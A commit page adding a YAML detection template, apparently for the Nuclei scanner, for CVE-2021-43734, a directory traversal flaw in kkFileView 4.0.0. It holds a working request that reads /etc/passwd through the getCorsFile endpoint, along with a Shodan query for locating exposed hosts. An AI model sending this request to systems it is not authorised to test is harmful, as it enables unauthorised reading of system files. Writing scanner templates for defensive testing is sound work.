Merge pull request #5157 from arafatansari/patch-68

Create CVE-2021-43734.yaml
patch-1
Prince Chaddha 2022-08-21 14:06:48 +05:30 committed by GitHub
commit a8383d023e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2021-43734
info:
name: kkFileview v4.0.0 - Directory Traversal
author: arafatansari
severity: high
reference:
- https://github.com/kekingcn/kkFileView/issues/304
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
description: |
kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
classification:
cve-id: CVE-2021-43734
metadata:
verified: true
shodan-query: http.html:"kkFileView"
tags: cve,cve2021,kkfileview,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200